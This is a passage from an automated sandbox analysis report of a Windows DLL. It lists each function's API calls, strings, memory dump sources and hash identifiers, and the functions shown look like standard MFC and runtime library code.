                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction ID: f69531b56b144151f4c46f4c2f1acf85afd3bdedcb4b37807a4dae52f16cbedc
                                                                                                                      • Opcode Fuzzy Hash: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
                                                                                                                      • Instruction Fuzzy Hash: AD817171D002699FDB10DFA5DD44AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E129 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44registryclipboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                      • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                      • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                      • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                      • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                      • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                      • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                      • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                      • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                      • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                      • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClipboardFormatRegister
                                                                                                                      • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                      • API String ID: 1228543026-2889995556
                                                                                                                      • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                      • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                      • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003548E Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                      • __mtterm.LIBCMT ref: 100354A0
                                                                                                                        • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                        • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                        • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                      • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                      • __init_pointers.LIBCMT ref: 10035552
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                      • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                      • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                      • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                      • API String ID: 4287529916-3819984048
                                                                                                                      • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                      • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                      • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                        • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                      • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                      • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                      • _memset.LIBCMT ref: 1001CA70
                                                                                                                      • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                      • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                      • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                      • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                      • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                      • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                      • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                      • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                      • API String ID: 867647115-4034971020
                                                                                                                      • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                      • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                      • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4128688680-0
                                                                                                                      • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                      • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                      • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                      • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                      • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                      • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 656273425-0
                                                                                                                      • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                      • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                      • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001AA48 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100161C0 Relevance: 18.1, APIs: 12, Instructions: 91synchronizationthreadinjectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10014538 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001736E Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
